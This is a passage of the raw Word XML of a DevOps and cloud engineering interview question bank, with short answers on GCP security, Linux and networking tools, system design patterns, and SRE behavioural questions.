        </w:rPr>
        <w:t>A: VPC Service Controls create security perimeters around supported GCP services to reduce data exfiltration risk. They are useful for sensitive data platforms and regulated environments.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>VPC Service Controls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Q741. What is SCC?</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Q742. Explain cloud audit logs.</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Q743. What is organization hierarchy?</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Q744. Explain billing accounts.</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Q745. What is quota management?</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Q746. Explain GCP networking troubleshooting.</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Q747. What is private Google access?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Private Google Access lets VMs without public IP addresses reach Google APIs and services through private networking. It is useful for secure private workloads.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Private Google Access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Q748. Explain Cloud Interconnect.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Cloud Interconnect provides dedicated private connectivity between on-prem networks and Google Cloud. It offers higher bandwidth and more predictable latency than VPN.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cloud Interconnect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Q749. What is Cloud VPN?</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Q750. Explain zero trust security.</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Q751. What is BeyondCorp?</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Q752. Explain cloud migration strategies.</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Q753. What is lift-and-shift?</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Q754. Explain refactoring migration.</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Q755. What is active-active architecture?</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Q756. Explain DR in GCP.</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Q757. What is backup strategy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A backup strategy defines what data is backed up, how often, where it is stored, how long it is retained, and how restores are tested. Backups should be encrypted, monitored, and isolated from primary failures.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Backup Strategy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Q758. Explain RTO and RPO.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: RTO is the maximum acceptable time to restore service after an incident. RPO is the maximum acceptable data loss window measured by time since the last recoverable copy.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Rto And Rpo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Q759. What is cloud-native design?</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Q760. Explain serverless architecture.</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Q761. What is API Gateway?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An API gateway is the entry point for client requests to backend services. It handles routing, authentication, rate limiting, request transformation, observability, and sometimes caching.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>API Gateway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Q762. Explain Apigee.</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Q763. What is cloud governance?</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Q764. Explain cloud tagging standards.</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Q765. What is FinOps?</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Q766. Explain cloud observability.</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Q767. What is cloud compliance?</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Q768. Explain HIPAA in cloud.</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Q769. What is PCI-DSS?</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Q770. Explain SOC2.</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Q771. What is cloud IAM best practice?</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Q772. Explain GKE Autopilot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GKE Autopilot is a managed GKE mode where Google manages nodes, scaling, many security defaults, and infrastructure operations. Teams focus more on workloads and less on node management.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Gke Autopilot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Q773. What is standard GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Standard GKE gives teams more control over node pools, machine types, networking, upgrades, and cluster configuration. It is useful when workloads need advanced customization.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Standard Gke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Q774. Explain node pools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Node pools are groups of GKE nodes with shared configuration such as machine type, labels, taints, autoscaling, and upgrades. They allow workload separation and specialized hardware such as GPUs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:b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Q775. What is private GKE cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A private GKE cluster has nodes without public IP addresses and can restrict control plane access. It improves security for production workloads when combined with private networking and controlled administration paths.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Private Gke Cluster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Q776. Explain Workload Identity Federation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Workload Identity Federation allows external workloads to access GCP resources without long-lived service account keys. It exchanges trusted external identity tokens for short-lived Google credentials.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:b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Q777. What is cloud shell?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Q778. Explain Infrastructure Manager.</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Q779. What is Artifact Analysis?</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Q780. Explain vulnerability scanning.</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Q781. What is organization policy service?</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Q782. Explain quota exhaustion scenarios.</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Q783. What are common GCP outages?</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Q784. Explain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Q785. What is cloud resilience?</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Q786. Explain enterprise landing zone.</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Q787. What are common GCP interview scenarios?</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Q788. Design a secure scalable GCP platform.</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2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Linux, Networking &amp; Security (651–760)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q789. What is Linux kernel?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Q790. Explain process management.</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Q791. What is systemd?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: systemd is the service and init manager used by many Linux distributions. It starts services, manages dependencies, tracks process state, handles logs with journald, and supports timers, sockets, and targets.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Systemd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Q792. Explain journald.</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Q793. What is cron?</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Q794. Explain file permissions.</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Q795. What is chmod?</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Q796. Explain chown.</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Q797. What is sudo?</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Q798. Explain SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SSH is a secure protocol for remote login and command execution over encrypted connections. It supports key-based authentication, port forwarding, bastion access, and secure automation.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>SSH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Q799. What is SCP?</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Q800. Explain rsync.</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Q801. Explain TCP/IP.</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Q802. What is HTTP?</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Q803. Explain HTTPS.</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Q804. What is TLS?</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Q805. Explain SSL handshake.</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Q806. What is load balancing?</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Q807. Explain reverse proxy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A reverse proxy sits in front of backend services and forwards client requests to them. It can provide TLS termination, routing, caching, compression, authentication, and rate limiting.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Reverse 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Q808. What is NGINX?</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Q809. Explain HAProxy.</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Q810. What is firewall?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A firewall controls network traffic based on rules such as source, destination, port, protocol, and connection state. It reduces exposure and enforces network security boundaries.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Firewall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Q811. Explain iptables.</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Q812. What is nftables?</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Q813. Explain SELinux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SELinux is a Linux mandatory access control system that enforces security policies beyond traditional permissions. It can restrict what processes can access even if they run as root.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Selinux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Q814. What is AppArmor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: AppArmor is a Linux mandatory access control system that confines programs using profiles. It limits file, network, and capability access to reduce damage from compromised processes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Apparmor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Q815. Explain PAM.</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Q816. What is LDAP?</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Q817. Explain OAuth2.</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Q818. What is OpenID Connect?</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Q819. Explain JWT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: JWT is a compact signed token format used to transmit claims between parties. It is common in authentication and authorization, but must be validated for signature, issuer, audience, expiry, and algorithm.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Jwt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Q820. What is SSO?</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Q821. Explain VPN.</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Q822. What is subnetting?</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Q823. Explain CIDR.</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Q824. What is NAT?</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Q825. Explain routing.</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Q826. What is BGP?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: BGP is the routing protocol used to exchange routes between autonomous systems on the internet and large private networks. It is powerful for multi-homing and traffic control but requires careful policy management.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Bgp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Q827. Explain VLAN.</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Q828. What is VXLAN?</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Q829. Explain packet capture.</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Q830. What is tcpdump?</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Q831. Explain Wireshark.</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Q832. What is netstat?</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Q833. Explain ss command.</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Q834. What is traceroute?</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Q835. Explain ping troubleshooting.</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Q836. What is DNS propagation?</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Q837. Explain split horizon DNS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Split horizon DNS returns different DNS answers based on the requester’s network location. It is commonly used to provide private internal addresses to internal clients and public addresses to external clients.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Split Horizon 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Q838. What is certificate management?</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Q839. Explain Let’s Encrypt.</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Q840. Explain secrets management.</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Q841. What is Vault?</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Q842. Explain encryption at rest.</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Q843. What is encryption in transit?</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Q844. Explain IAM principles.</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Q845. Explain zero trust.</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Q846. What is SOC?</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Q847. Explain SIEM.</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Q848. What is IDS/IPS?</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Q849. Explain DDoS mitigation.</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Q850. What is vulnerability management?</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Q851. Explain CVE.</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Q852. What is patch management?</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Q853. Explain threat modeling.</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Q854. What is RBAC security?</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Q855. Explain ABAC.</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Q856. What is network segmentation?</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Q857. Explain bastion hosts.</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Q858. What is jump server?</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Q859. Explain SSH hardening.</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Q860. What is kernel panic?</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Q861. Explain memory leaks.</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Q862. What is CPU steal?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Q863. Explain disk I/O bottlenecks.</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Q864. What is inode exhaustion?</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Q865. Explain Linux troubleshooting.</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Q866. What is top command?</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Q867. Explain htop.</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Q868. What is vmstat?</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Q869. Explain iostat.</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Q870. What is sar?</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Q871. Explain system performance tuning.</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Q872. What is swap memory?</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Q873. Explain OOM killer.</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Q874. What is process zombie?</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Q875. Explain orphan process.</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Q876. What is shell scripting?</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Q877. Explain Bash functions.</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Q878. What is awk?</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Q879. Explain sed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: sed is a stream editor used to search, replace, delete, and transform text non-interactively. It is useful in scripts and pipelines for quick text edits.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sed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Q880. What is grep?</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Q881. Explain regex.</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Q882. What is curl?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Q883. Explain wget.</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Q884. What is nc command?</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Q885. Explain telnet troubleshooting.</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Q886. What is Linux namespace?</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Q887. Explain cgroups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: cgroups control and account for resource usage such as CPU, memory, disk I/O, and processes. Containers use cgroups to enforce resource limits.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Cgroups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Q888. What is kernel tuning?</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Q889. Explain sysctl.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Q890. What are common Linux failures?</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Q891. Explain production debugging.</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Q892. What are common networking interview scenarios?</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Q893. Explain secure infrastructure design.</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Q894. What are common security incidents?</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Q895. Design a zero-trust infrastructure.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2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>System Design &amp; Architecture (761–860)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q896. What is system design?</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Q897. Explain scalability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scalability is the ability of a system to handle increased load by adding resources or improving efficiency. It can involve horizontal scaling, vertical scaling, caching, partitioning, asynchronous processing, and autoscaling.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Scalability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Q898. What is horizontal scaling?</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Q899. Explain vertical scaling.</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Q900. What is high availability?</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Q901. Explain fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Fault tolerance is the ability to continue operating when components fail. It requires redundancy, retries, replication, isolation, graceful degradation, and failure-aware design.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Fault Tolerance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Q902. What is resiliency?</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Q903. Explain load balancing strategies.</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Q904. What is distributed system?</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Q905. Explain CAP theorem.</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Q906. What is eventual consistency?</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Q907. Explain strong consistency.</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Q908. What is message queue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A message queue stores messages between producers and consumers for asynchronous processing. It decouples services, smooths traffic spikes, supports retries, and improves resilience.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Message Queue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Q909. Explain Kafka.</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Q910. What is RabbitMQ?</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Q911. Explain event-driven architecture.</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Q912. What is microservices architecture?</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Q913. Explain monolith vs microservices.</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Q914. Explain service discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Service discovery lets clients find service instances dynamically. It is important in elastic environments where instances start, stop, and move frequently.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Service Discovery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Q915. What is circuit breaker?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A circuit breaker stops calls to a failing dependency after errors cross a threshold. It prevents cascading failures and gives dependencies time to recover.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Circuit Breaker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Q916. Explain retry mechanisms.</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Q917. What is rate limiting?</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Q918. Explain caching.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Caching stores frequently used data closer to the requester to reduce latency and backend load. Good caching needs invalidation strategy, TTLs, consistency expectations, and capacity planning.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Caching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Q919. What is Redis?</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Q920. Explain CDN.</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Q921. What is edge computing?</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Q922. Explain multi-region architecture.</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Q923. What is disaster recovery?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Disaster recovery is the plan and architecture for restoring service after major failures. It defines RTO, RPO, backups, replication, failover, runbooks, and regular testing.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Disaster Recovery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Q924. Explain active-passive architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Active-passive architecture has one active site serving traffic and a standby site ready for failover. It is simpler than active-active but may have higher recovery time.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Active-passive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Q925. What is active-active setup?</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Q926. Explain data partitioning.</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Q927. What is sharding?</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Q928. Explain replication.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Replication copies data across nodes or regions for availability, read scaling, and disaster recovery. Designs must choose between synchronous and asynchronous replication tradeoffs.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Replication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Q929. What is consensus algorithm?</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Q930. Explain Raft.</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Q931. What is leader election?</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Q932. Explain distributed locking.</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Q933. Explain API versioning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: API versioning manages changes to APIs without breaking existing clients. Common approaches include URL versions, headers, backward-compatible changes, and deprecation windows.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>API Versioning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Q934. What is observability in distributed systems?</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Q935. Explain tracing in microservices.</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Q936. What is service mesh?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A service mesh manages service-to-service communication using sidecars or proxies. It can provide mTLS, traffic routing, retries, observability, and policy enforcement.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Service Mesh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Q937. Explain platform engineering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Platform engineering builds internal platforms that help developers ship software faster and safer. It focuses on self-service workflows, reusable infrastructure, golden paths, and operational standards.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Platform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Q938. What is internal developer platform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An internal developer platform provides self-service tools, templates, pipelines, environments, and observability for engineering teams. It reduces cognitive load and standardizes delivery.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Internal Developer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Q939. Explain golden paths.</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Q940. What is multi-tenancy?</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Q941. Explain tenant isolation.</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Q942. What is cloud-native architecture?</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Q943. Explain event sourcing.</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Q944. What is CQRS?</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Q945. Explain stream processing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Stream processing continuously processes data as it arrives. It is used for real-time analytics, fraud detection, monitoring, IoT, and event-driven systems.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Stream Processing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Q946. What is serverless design?</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Q947. Explain queue backpressure.</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Q948. What is autoscaling strategy?</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Q949. Explain queue-based scaling.</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Q950. What is cold start?</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Q951. Explain API throttling.</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Q952. What is resilience testing?</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Q953. Explain chaos engineering.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Chaos engineering intentionally injects controlled failures to learn how systems behave. It improves resilience by validating assumptions before real incidents occur.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Chaos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Q954. What is graceful degradation?</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Q955. Explain fallback strategies.</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Q956. What is blue-green architecture?</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Q957. Explain canary analysis.</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Q958. What is workload isolation?</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Q959. Explain platform reliability.</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Q960. What is blast radius?</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Q961. Explain bulkhead pattern.</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Q962. What is anti-corruption layer?</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Q963. Explain hexagonal architecture.</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Q964. What is domain-driven design?</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Q965. Explain bounded context.</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Q966. What is technical debt?</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Q967. Explain architecture governance.</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Q968. What is platform scalability challenge?</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Q969. Explain data lake architecture.</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Q970. What is lakehouse?</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Q971. Explain ML platform design.</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Q972. What is feature store architecture?</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Q973. Explain real-time inference design.</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Q974. What is model serving architecture?</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Q975. Explain ML training platform.</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Q976. What is inference gateway?</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Q977. Explain GPU cluster architecture.</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Q978. What is edge inference?</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Q979. Explain hybrid cloud architecture.</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Q980. What is API-first design?</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Q981. Explain workflow orchestration.</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Q982. What is distributed tracing architecture?</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Q983. Explain observability pipeline design.</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Q984. What is DR testing?</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Q985. Explain scaling bottlenecks.</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Q986. What is traffic shaping?</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Q987. Explain zero downtime deployment.</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Q988. Explain cloud-native patterns.</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Q989. What are common system design interview scenarios?</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Q990. Design a global-scale Kubernetes platform.</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Q991. Design an enterprise MLOps platform.</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Q992. Design a highly available SaaS application.</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2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>SRE, Behavioural &amp; Scenario Questions (861–1000)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q993. Explain a major production outage you handled.</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Q994. Describe a difficult Kubernetes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Q995. Tell me about a failed deployment.</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Q996. Explain how you reduced MTTR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain how better alerts, runbooks, dashboards, ownership, automation, and rollback reduced recovery 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Q997. Describe a Sev-1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Q998. Explain your RCA process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Describe timeline reconstruction, contributing factors, customer impact, root cause, corrective actions, owners, and due dates.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Q999. Describe a networking issue you solved.</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Q1000. Explain a scaling problem you fixed.</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Q1001. Describe a cloud cost optimization initiative.</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Q1002. Explain a CI/CD pipeline failure.</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Q1003. Describe a Terraform state issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Mention state locking, drift, provider versions, plan review, remote state, imports, and safe recovery from partial applies.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Q1004. Explain a Kubernetes upgrade challenge.</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Q1005. Describe a security incident response.</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Q1006. Explain how you handled alert fatigue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain deduplication, severity tuning, ownership, SLO-based alerts, silences, runbooks, and removal of non-actionable alerts.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Q1007. Describe a high-pressure production issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a high-pressure production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Q1008. Explain a monitoring gap you identified.</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Q1009. Describe your on-call experience.</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Q1010. Explain a rollback strategy you used.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. Explain rollback trigger, artifact versioning, database compatibility, traffic switch, validation, and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Q1011. Describe a migration project.</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Q1012. Explain a multi-cloud challenge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should use a clear STAR structure: situation, responsibility, action, and measurable result. For a multi-cloud challenge,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Q1013. Describe a difficult stakeholder conversation.</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Q1014. Explain how you mentor juniors.</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Q1015. Describe a failed architecture decision.</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Q1016. Explain a successful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Q1017. Describe a GitOps implementation.</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Q1018. Explain your Kubernetes troubleshooting process.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Q1019. Describe a DNS outage scenario.</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Q1020. Explain pod crash debugging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
